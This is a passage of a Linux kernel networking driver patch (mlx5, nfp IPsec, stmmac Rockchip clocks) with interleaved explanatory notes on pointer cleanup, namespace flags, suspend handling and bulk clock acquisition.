+index 1f4233b2842f7..53eba076c53fc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5208,6 +5208,7 @@ static void mlx5e_nic_cleanup(struct mlx5e_priv *priv)
+ 	mlx5e_health_destroy_reporters(priv);
+ 	mlx5e_ktls_cleanup(priv);
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 301a734b7c6a7..21426decc4bde 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -822,6 +822,7 @@ static int mlx5e_init_ul_rep(struct mlx5_core_dev *mdev,
+ static void mlx5e_cleanup_rep(struct mlx5e_priv *priv)
+ {
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_create_rep_ttc_table(struct mlx5e_priv *priv)
+@@ -988,6 +989,7 @@ err_close_drop_rq:
+ 	priv->rx_res = NULL;
+ err_free_fs:
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ 	return err;
+ }
+ 
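
Note: these mlx5e hunks all implement one defensive idiom: a pointer that is freed but may be reached again (the promisc table after a failed create, priv->fs after cleanup) is NULLed immediately, and the cleanup routine tolerates NULL. The names below are placeholders for the pattern, not the driver's types:

    #include <linux/slab.h>

    struct flow_steering { void *tables; /* ... */ };
    struct owner { struct flow_steering *fs; };

    static void fs_cleanup(struct flow_steering *fs)
    {
            if (!fs)        /* tolerate failed init or double cleanup */
                    return;
            /* ... destroy sub-objects ... */
            kfree(fs);
    }

    static void owner_cleanup(struct owner *o)
    {
            fs_cleanup(o->fs);
            o->fs = NULL;   /* later teardown sees NULL, not a stale pointer */
    }
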
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+index 9e72118f2e4c0..749c3957a1280 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+@@ -11,7 +11,7 @@ struct mlx5_vport_key {
+ 	u16 prio;
+ 	u16 vport;
+ 	u16 vhca_id;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ } __packed;
+ 
+ struct mlx5_vport_table {
+@@ -21,6 +21,14 @@ struct mlx5_vport_table {
+ 	struct mlx5_vport_key key;
+ };
+ 
++static void
++esw_vport_tbl_init(struct mlx5_eswitch *esw, struct esw_vport_tbl_namespace *ns)
++{
++	if (esw->offloads.encap != DEVLINK_ESWITCH_ENCAP_MODE_NONE)
++		ns->flags |= (MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT |
++			      MLX5_FLOW_TABLE_TUNNEL_EN_DECAP);
++}
++
+ static struct mlx5_flow_table *
+ esw_vport_tbl_create(struct mlx5_eswitch *esw, struct mlx5_flow_namespace *ns,
+ 		     const struct esw_vport_tbl_namespace *vport_ns)
+@@ -80,6 +88,7 @@ mlx5_esw_vporttbl_get(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &skey);
+ 	e = esw_vport_tbl_lookup(esw, &skey, hkey);
+ 	if (e) {
+@@ -127,6 +136,7 @@ mlx5_esw_vporttbl_put(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &key);
+ 	e = esw_vport_tbl_lookup(esw, &key, hkey);
+ 	if (!e || --e->num_rules)
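
Note: the esw_vport_tbl_namespace definitions lose their const so that tunnel decap/reformat support can be decided per lookup from the live encap mode rather than frozen into a static initializer (the sample namespace had hardcoded the flags; the mirror namespace had none). Both get and put recompute the flags under fdb_table.offloads.vports.lock, so the hash key always matches the namespace state. Schematically, with made-up names standing in for MLX5_FLOW_TABLE_TUNNEL_EN_{REFORMAT,DECAP}:

    enum { TBL_TUNNEL_REFORMAT = 1 << 0, TBL_TUNNEL_DECAP = 1 << 1 };
    enum encap_mode { ENCAP_NONE, ENCAP_BASIC };

    struct tbl_namespace {
            unsigned int max_fte;
            unsigned int flags;     /* no longer const: filled at use time */
    };

    struct esw_state { enum encap_mode encap_mode; };

    static void tbl_ns_init(const struct esw_state *esw,
                            struct tbl_namespace *ns)
    {
            if (esw->encap_mode != ENCAP_NONE)
                    ns->flags |= TBL_TUNNEL_REFORMAT | TBL_TUNNEL_DECAP;
    }
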
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 92644fbb50816..ceb6722c84e2c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -677,7 +677,7 @@ struct mlx5_vport_tbl_attr {
+ 	u32 chain;
+ 	u16 prio;
+ 	u16 vport;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ };
+ 
+ struct mlx5_flow_table *
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 0facc709f0e74..6561b6b505568 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -73,7 +73,7 @@
+ 
+ #define MLX5_ESW_FT_OFFLOADS_DROP_RULE (1)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE,
+ 	.max_num_groups = MLX5_ESW_VPORT_TBL_NUM_GROUPS,
+ 	.flags = 0,
+@@ -763,7 +763,6 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 	kfree(dest);
+ 	return rule;
+ err_chain_src_rewrite:
+-	esw_put_dest_tables_loop(esw, attr, 0, i);
+ 	mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ err_get_fwd:
+ 	mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+@@ -806,7 +805,6 @@ __mlx5_eswitch_del_rule(struct mlx5_eswitch *esw,
+ 	if (fwd_rule)  {
+ 		mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ 		mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+-		esw_put_dest_tables_loop(esw, attr, 0, esw_attr->split_count);
+ 	} else {
+ 		if (split)
+ 			mlx5_esw_vporttbl_put(esw, &fwd_attr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c
+index 3a9a6bb9158de..edd9102583144 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c
+@@ -210,18 +210,6 @@ static bool mlx5_eswitch_offload_is_uplink_port(const struct mlx5_eswitch *esw,
+ 	return (port_mask & port_value) == MLX5_VPORT_UPLINK;
+ }
+ 
+-static bool
+-mlx5_eswitch_is_push_vlan_no_cap(struct mlx5_eswitch *esw,
+-				 struct mlx5_flow_act *flow_act)
+-{
+-	if (flow_act->action & MLX5_FLOW_CONTEXT_ACTION_VLAN_PUSH &&
+-	    !(mlx5_fs_get_capabilities(esw->dev, MLX5_FLOW_NAMESPACE_FDB) &
+-	      MLX5_FLOW_STEERING_CAP_VLAN_PUSH_ON_RX))
+-		return true;
+-
+-	return false;
+-}
+-
+ bool
+ mlx5_eswitch_termtbl_required(struct mlx5_eswitch *esw,
+ 			      struct mlx5_flow_attr *attr,
+@@ -237,7 +225,10 @@ mlx5_eswitch_termtbl_required(struct mlx5_eswitch *esw,
+ 	    (!mlx5_eswitch_offload_is_uplink_port(esw, spec) && !esw_attr->int_port))
+ 		return false;
+ 
+-	if (mlx5_eswitch_is_push_vlan_no_cap(esw, flow_act))
++	/* push vlan on RX */
++	if (flow_act->action & MLX5_FLOW_CONTEXT_ACTION_VLAN_PUSH &&
++	    !(mlx5_fs_get_capabilities(esw->dev, MLX5_FLOW_NAMESPACE_FDB) &
++	      MLX5_FLOW_STEERING_CAP_VLAN_PUSH_ON_RX))
+ 		return true;
+ 
+ 	/* hairpin */
+@@ -261,31 +252,19 @@ mlx5_eswitch_add_termtbl_rule(struct mlx5_eswitch *esw,
+ 	struct mlx5_flow_act term_tbl_act = {};
+ 	struct mlx5_flow_handle *rule = NULL;
+ 	bool term_table_created = false;
+-	bool is_push_vlan_on_rx;
+ 	int num_vport_dests = 0;
+ 	int i, curr_dest;
+ 
+-	is_push_vlan_on_rx = mlx5_eswitch_is_push_vlan_no_cap(esw, flow_act);
+ 	mlx5_eswitch_termtbl_actions_move(flow_act, &term_tbl_act);
+ 	term_tbl_act.action |= MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 
+ 	for (i = 0; i < num_dest; i++) {
+ 		struct mlx5_termtbl_handle *tt;
+-		bool hairpin = false;
+ 
+ 		/* only vport destinations can be terminated */
+ 		if (dest[i].type != MLX5_FLOW_DESTINATION_TYPE_VPORT)
+ 			continue;
+ 
+-		if (attr->dests[num_vport_dests].rep &&
+-		    attr->dests[num_vport_dests].rep->vport == MLX5_VPORT_UPLINK)
+-			hairpin = true;
+-
+-		if (!is_push_vlan_on_rx && !hairpin) {
+-			num_vport_dests++;
+-			continue;
+-		}
+-
+ 		if (attr->dests[num_vport_dests].flags & MLX5_ESW_DEST_ENCAP) {
+ 			term_tbl_act.action |= MLX5_FLOW_CONTEXT_ACTION_PACKET_REFORMAT;
+ 			term_tbl_act.pkt_reformat = attr->dests[num_vport_dests].pkt_reformat;
+@@ -333,9 +312,6 @@ revert_changes:
+ 	for (curr_dest = 0; curr_dest < num_vport_dests; curr_dest++) {
+ 		struct mlx5_termtbl_handle *tt = attr->dests[curr_dest].termtbl;
+ 
+-		if (!tt)
+-			continue;
+-
+ 		attr->dests[curr_dest].termtbl = NULL;
+ 
+ 		/* search for the destination associated with the
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index 1e46f9afa40e0..d219f8417d93a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -150,11 +150,11 @@ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ 	if (test_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags)) {
+ 		complete(&fw_reset->done);
+ 	} else {
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 		if (mlx5_health_wait_pci_up(dev))
+ 			mlx5_core_err(dev, "reset reload flow aborted, PCI reads still not working\n");
+ 		else
+-			mlx5_load_one(dev, false);
++			mlx5_load_one(dev, true);
+ 		devlink_remote_reload_actions_performed(priv_to_devlink(dev), 0,
+ 							BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT) |
+ 							BIT(DEVLINK_RELOAD_ACTION_FW_ACTIVATE));
+@@ -484,8 +484,8 @@ int mlx5_fw_reset_wait_reset_done(struct mlx5_core_dev *dev)
+ 	}
+ 	err = fw_reset->ret;
+ 	if (test_and_clear_bit(MLX5_FW_RESET_FLAGS_RELOAD_REQUIRED, &fw_reset->reset_flags)) {
+-		mlx5_unload_one_devl_locked(dev);
+-		mlx5_load_one_devl_locked(dev, false);
++		mlx5_unload_one_devl_locked(dev, false);
++		mlx5_load_one_devl_locked(dev, true);
+ 	}
+ out:
+ 	clear_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 879555ba847dd..e42e4ac231c64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -699,7 +699,7 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 		 * requests from the kernel.
+ 		 */
+ 		mlx5_core_err(dev, "Driver is in error state. Unloading\n");
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index f4e0431da55b4..0bb010d00a659 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1502,12 +1502,12 @@ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery)
+ 	return ret;
+ }
+ 
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev)
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	devl_assert_locked(priv_to_devlink(dev));
+ 	mutex_lock(&dev->intf_state_mutex);
+ 
+-	mlx5_detach_device(dev);
++	mlx5_detach_device(dev, suspend);
+ 
+ 	if (!test_bit(MLX5_INTERFACE_STATE_UP, &dev->intf_state)) {
+ 		mlx5_core_warn(dev, "%s: interface is down, NOP\n",
+@@ -1522,12 +1522,12 @@ out:
+ 	mutex_unlock(&dev->intf_state_mutex);
+ }
+ 
+-void mlx5_unload_one(struct mlx5_core_dev *dev)
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	devl_lock(devlink);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, suspend);
+ 	devl_unlock(devlink);
+ }
+ 
+@@ -1809,7 +1809,7 @@ static pci_ers_result_t mlx5_pci_err_detected(struct pci_dev *pdev,
+ 
+ 	mlx5_enter_error_state(dev, false);
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 	mlx5_drain_health_wq(dev);
+ 	mlx5_pci_disable_device(dev);
+ 
+@@ -1966,7 +1966,7 @@ static void shutdown(struct pci_dev *pdev)
+ 	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	err = mlx5_try_fast_unload(dev);
+ 	if (err)
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	mlx5_pci_disable_device(dev);
+ }
+ 
+@@ -1974,7 +1974,7 @@ static int mlx5_suspend(struct pci_dev *pdev, pm_message_t state)
+ {
+ 	struct mlx5_core_dev *dev = pci_get_drvdata(pdev);
+ 
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 
+ 	return 0;
+ }
+@@ -2017,7 +2017,7 @@ MODULE_DEVICE_TABLE(pci, mlx5_core_pci_table);
+ void mlx5_disable_device(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, false);
+ }
+ 
+ int mlx5_recover_device(struct mlx5_core_dev *dev)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+index 029305a8b80a8..a3c5c2dab5fd7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+@@ -236,7 +236,7 @@ void mlx5_adev_cleanup(struct mlx5_core_dev *dev);
+ int mlx5_adev_init(struct mlx5_core_dev *dev);
+ 
+ int mlx5_attach_device(struct mlx5_core_dev *dev);
+-void mlx5_detach_device(struct mlx5_core_dev *dev);
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_register_device(struct mlx5_core_dev *dev);
+ void mlx5_unregister_device(struct mlx5_core_dev *dev);
+ struct mlx5_core_dev *mlx5_get_next_phys_dev_lag(struct mlx5_core_dev *dev);
+@@ -319,8 +319,8 @@ int mlx5_mdev_init(struct mlx5_core_dev *dev, int profile_idx);
+ void mlx5_mdev_uninit(struct mlx5_core_dev *dev);
+ int mlx5_init_one(struct mlx5_core_dev *dev);
+ void mlx5_uninit_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev);
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend);
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery);
+ int mlx5_load_one_devl_locked(struct mlx5_core_dev *dev, bool recovery);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+index 7b4783ce213e2..a7377619ba6f2 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+@@ -74,7 +74,7 @@ static void mlx5_sf_dev_shutdown(struct auxiliary_device *adev)
+ {
+ 	struct mlx5_sf_dev *sf_dev = container_of(adev, struct mlx5_sf_dev, adev);
+ 
+-	mlx5_unload_one(sf_dev->mdev);
++	mlx5_unload_one(sf_dev->mdev, false);
+ }
+ 
+ static const struct auxiliary_device_id mlx5_sf_dev_id_table[] = {
+diff --git a/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c b/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c
+index 063cd371033a8..b7cf18fcb9461 100644
+--- a/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c
++++ b/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c
+@@ -267,7 +267,7 @@ static void set_sha2_512hmac(struct nfp_ipsec_cfg_add_sa *cfg, int *trunc_len)
+ 
+ static int nfp_net_xfrm_add_state(struct xfrm_state *x)
+ {
+-	struct net_device *netdev = x->xso.dev;
++	struct net_device *netdev = x->xso.real_dev;
+ 	struct nfp_ipsec_cfg_mssg msg = {};
+ 	int i, key_len, trunc_len, err = 0;
+ 	struct nfp_ipsec_cfg_add_sa *cfg;
+@@ -503,7 +503,7 @@ static void nfp_net_xfrm_del_state(struct xfrm_state *x)
+ 		.cmd = NFP_IPSEC_CFG_MSSG_INV_SA,
+ 		.sa_idx = x->xso.offload_handle - 1,
+ 	};
+-	struct net_device *netdev = x->xso.dev;
++	struct net_device *netdev = x->xso.real_dev;
+ 	struct nfp_net *nn;
+ 	int err;
+ 
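
Note: the nfp fix swaps x->xso.dev for x->xso.real_dev in both SA add and delete. When IPsec offload runs below a virtual upper device such as a bond, xso.dev points at the upper while xso.real_dev is the port whose driver owns the hardware SA table, so driver-private state must be derived from the latter. A sketch with an invented driver (drv_priv and drv_program_sa are hypothetical):

    #include <net/xfrm.h>

    struct drv_priv;                                               /* hypothetical */
    int drv_program_sa(struct drv_priv *p, struct xfrm_state *x);  /* hypothetical */

    static int example_xfrm_add_state(struct xfrm_state *x)
    {
            /* xso.dev may be a bond/team upper; xso.real_dev is the port
             * whose driver owns the hardware SA table.
             */
            struct net_device *netdev = x->xso.real_dev;

            return drv_program_sa(netdev_priv(netdev), x);
    }
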
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+index 6656d76b6766b..cf682a9e3fff2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+@@ -39,6 +39,24 @@ struct rk_gmac_ops {
+ 	u32 regs[];
+ };
+ 
++static const char * const rk_clocks[] = {
++	"aclk_mac", "pclk_mac", "mac_clk_tx", "clk_mac_speed",
++};
++
++static const char * const rk_rmii_clocks[] = {
++	"mac_clk_rx", "clk_mac_ref", "clk_mac_refout",
++};
++
++enum rk_clocks_index {
++	RK_ACLK_MAC = 0,
++	RK_PCLK_MAC,
++	RK_MAC_CLK_TX,
++	RK_CLK_MAC_SPEED,
++	RK_MAC_CLK_RX,
++	RK_CLK_MAC_REF,
++	RK_CLK_MAC_REFOUT,
++};
++
+ struct rk_priv_data {
+ 	struct platform_device *pdev;
+ 	phy_interface_t phy_iface;
+@@ -51,15 +69,9 @@ struct rk_priv_data {
+ 	bool clock_input;
+ 	bool integrated_phy;
+ 
++	struct clk_bulk_data *clks;
++	int num_clks;
+ 	struct clk *clk_mac;
+-	struct clk *gmac_clkin;
+-	struct clk *mac_clk_rx;
+-	struct clk *mac_clk_tx;
+-	struct clk *clk_mac_ref;
+-	struct clk *clk_mac_refout;
+-	struct clk *clk_mac_speed;
+-	struct clk *aclk_mac;
+-	struct clk *pclk_mac;
+ 	struct clk *clk_phy;
+ 
+ 	struct reset_control *phy_reset;
+@@ -104,10 +116,11 @@ static void px30_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	int ret;
+ 
+-	if (IS_ERR(bsp_priv->clk_mac_speed)) {
++	if (!clk_mac_speed) {
+ 		dev_err(dev, "%s: Missing clk_mac_speed clock\n", __func__);
+ 		return;
+ 	}
+@@ -116,7 +129,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_10M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 2500000);
++		ret = clk_set_rate(clk_mac_speed, 2500000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 2500000 failed: %d\n",
+ 				__func__, ret);
+@@ -124,7 +137,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_100M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 25000000);
++		ret = clk_set_rate(clk_mac_speed, 25000000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 25000000 failed: %d\n",
+ 				__func__, ret);
+@@ -1066,6 +1079,7 @@ static void rk3568_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1085,7 +1099,7 @@ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1371,6 +1385,7 @@ static void rv1126_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1390,7 +1405,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1398,6 +1413,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 
+ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1414,7 +1430,7 @@ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1475,68 +1491,50 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ {
+ 	struct rk_priv_data *bsp_priv = plat->bsp_priv;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+-	int ret;
++	int phy_iface = bsp_priv->phy_iface;
++	int i, j, ret;
+ 
+ 	bsp_priv->clk_enabled = false;
+ 
+-	bsp_priv->mac_clk_rx = devm_clk_get(dev, "mac_clk_rx");
+-	if (IS_ERR(bsp_priv->mac_clk_rx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_rx");
++	bsp_priv->num_clks = ARRAY_SIZE(rk_clocks);
++	if (phy_iface == PHY_INTERFACE_MODE_RMII)
++		bsp_priv->num_clks += ARRAY_SIZE(rk_rmii_clocks);
+ 
+-	bsp_priv->mac_clk_tx = devm_clk_get(dev, "mac_clk_tx");
+-	if (IS_ERR(bsp_priv->mac_clk_tx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_tx");
++	bsp_priv->clks = devm_kcalloc(dev, bsp_priv->num_clks,
++				      sizeof(*bsp_priv->clks), GFP_KERNEL);
++	if (!bsp_priv->clks)
++		return -ENOMEM;
+ 
+-	bsp_priv->aclk_mac = devm_clk_get(dev, "aclk_mac");
+-	if (IS_ERR(bsp_priv->aclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"aclk_mac");
++	for (i = 0; i < ARRAY_SIZE(rk_clocks); i++)
++		bsp_priv->clks[i].id = rk_clocks[i];
+ 
+-	bsp_priv->pclk_mac = devm_clk_get(dev, "pclk_mac");
+-	if (IS_ERR(bsp_priv->pclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"pclk_mac");
+-
+-	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
+-	if (IS_ERR(bsp_priv->clk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"stmmaceth");
+-
+-	if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII) {
+-		bsp_priv->clk_mac_ref = devm_clk_get(dev, "clk_mac_ref");
+-		if (IS_ERR(bsp_priv->clk_mac_ref))
+-			dev_err(dev, "cannot get clock %s\n",
+-				"clk_mac_ref");
+-
+-		if (!bsp_priv->clock_input) {
+-			bsp_priv->clk_mac_refout =
+-				devm_clk_get(dev, "clk_mac_refout");
+-			if (IS_ERR(bsp_priv->clk_mac_refout))
+-				dev_err(dev, "cannot get clock %s\n",
+-					"clk_mac_refout");
+-		}
++	if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		for (j = 0; j < ARRAY_SIZE(rk_rmii_clocks); j++)
++			bsp_priv->clks[i++].id = rk_rmii_clocks[j];
+ 	}
+ 
+-	bsp_priv->clk_mac_speed = devm_clk_get(dev, "clk_mac_speed");
+-	if (IS_ERR(bsp_priv->clk_mac_speed))
+-		dev_err(dev, "cannot get clock %s\n", "clk_mac_speed");
++	ret = devm_clk_bulk_get_optional(dev, bsp_priv->num_clks,
++					 bsp_priv->clks);
++	if (ret)
++		return dev_err_probe(dev, ret, "Failed to get clocks\n");
++
++	/* "stmmaceth" will be enabled by the core */
++	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
++	ret = PTR_ERR_OR_ZERO(bsp_priv->clk_mac);
++	if (ret)
++		return dev_err_probe(dev, ret, "Cannot get stmmaceth clock\n");
+ 
+ 	if (bsp_priv->clock_input) {
+ 		dev_info(dev, "clock input from PHY\n");
+-	} else {
+-		if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII)
+-			clk_set_rate(bsp_priv->clk_mac, 50000000);
++	} else if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		clk_set_rate(bsp_priv->clk_mac, 50000000);
+ 	}
+ 
+ 	if (plat->phy_node && bsp_priv->integrated_phy) {
+ 		bsp_priv->clk_phy = of_clk_get(plat->phy_node, 0);
+-		if (IS_ERR(bsp_priv->clk_phy)) {
+-			ret = PTR_ERR(bsp_priv->clk_phy);
+-			dev_err(dev, "Cannot get PHY clock: %d\n", ret);
+-			return -EINVAL;
+-		}
